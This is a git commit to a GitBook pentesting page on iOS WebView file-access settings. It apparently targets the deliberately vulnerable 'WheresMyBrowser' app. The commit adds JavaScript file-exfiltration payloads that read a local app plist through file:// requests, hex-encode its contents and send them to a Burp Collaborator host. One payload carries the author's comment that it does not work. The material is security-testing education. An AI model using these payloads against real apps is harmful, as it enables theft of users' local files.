GitBook: [master] one page modified
This commit is contained in:
parent
d38dd12c95
commit
418360ab5c
|
@ -174,6 +174,34 @@ $ rabin2 -zz ./WheresMyBrowser | grep -i "loadHTMLString"
|
|||
* File access from `file://` URLs is always enabled.
|
||||
* Universal access from `file://` URLs is always enabled.
|
||||
* If you retrieve the effective origin from a `UIWebView` where `baseURL` is also set to `nil` you will see that it is **not set to "null"**, instead you'll obtain something similar to the following: `applewebdata://5361016c-f4a0-4305-816b-65411fc1d78`0. This origin "applewebdata://" is similar to the "file://" origin as it **does not implement Same-Origin Policy** and allow access to local files and any web resources.
|
||||
|
||||
{% tabs %}
|
||||
{% tab title="exfiltrate\_file" %}
|
||||
```javascript
|
||||
String.prototype.hexEncode = function(){
|
||||
var hex, i;
|
||||
var result = "";
|
||||
for (i=0; i<this.length; i++) {
|
||||
hex = this.charCodeAt(i).toString(16);
|
||||
result += ("000"+hex).slice(-4);
|
||||
}
|
||||
return result
|
||||
}
|
||||
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.onreadystatechange = function() {
|
||||
if (xhr.readyState == XMLHttpRequest.DONE) {
|
||||
var xhr2 = new XMLHttpRequest();
|
||||
xhr2.open('GET', 'http://187e2gd0zxunzmb5vlowsz4j1a70vp.burpcollaborator.net/'+xhr.responseText.hexEncode(), true);
|
||||
xhr2.send(null);
|
||||
}
|
||||
}
|
||||
xhr.open('GET', 'file:///var/mobile/Containers/Data/Application/ED4E0AD8-F7F7-4078-93CC-C350465048A5/Library/Preferences/com.authenticationfailure.WheresMyBrowser.plist', true);
|
||||
xhr.send(null);
|
||||
```
|
||||
{% endtab %}
|
||||
{% endtabs %}
|
||||
|
||||
* **WKWebView**:
|
||||
* **`allowFileAccessFromFileURLs`** \(`WKPreferences`, `false` by default\): it enables JavaScript running in the context of a `file://` scheme URL to access content from other `file://` scheme URLs.
|
||||
* **`allowUniversalAccessFromFileURLs`** \(`WKWebViewConfiguration`, `false` by default\): it enables JavaScript running in the context of a `file://` scheme URL to access content from any origin.
|
||||
|
@ -214,11 +242,23 @@ allowUniversalAccessFromFileURLs: 0
|
|||
#### Exfiltrate arbitrary files
|
||||
|
||||
```javascript
|
||||
//For some reason this payload doesn't work!!
|
||||
//Let me know if you know how to exfiltrate local files from a WKWebView
|
||||
String.prototype.hexEncode = function(){
|
||||
var hex, i;
|
||||
var result = "";
|
||||
for (i=0; i<this.length; i++) {
|
||||
hex = this.charCodeAt(i).toString(16);
|
||||
result += ("000"+hex).slice(-4);
|
||||
}
|
||||
return result
|
||||
}
|
||||
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.onreadystatechange = function() {
|
||||
if (xhr.readyState == XMLHttpRequest.DONE) {
|
||||
var xhr2 = new XMLHttpRequest();
|
||||
xhr2.open('GET', 'http://187e2gd0zxunzmb5vlowsz4j1a70vp.burpcollaborator.net/'+btoa(), true);
|
||||
xhr2.open('GET', 'http://187e2gd0zxunzmb5vlowsz4j1a70vp.burpcollaborator.net/'+xhr.responseText.hexEncode(), true);
|
||||
xhr2.send(null);
|
||||
}
|
||||
}
|
||||
|
|
Loading…
Reference in New Issue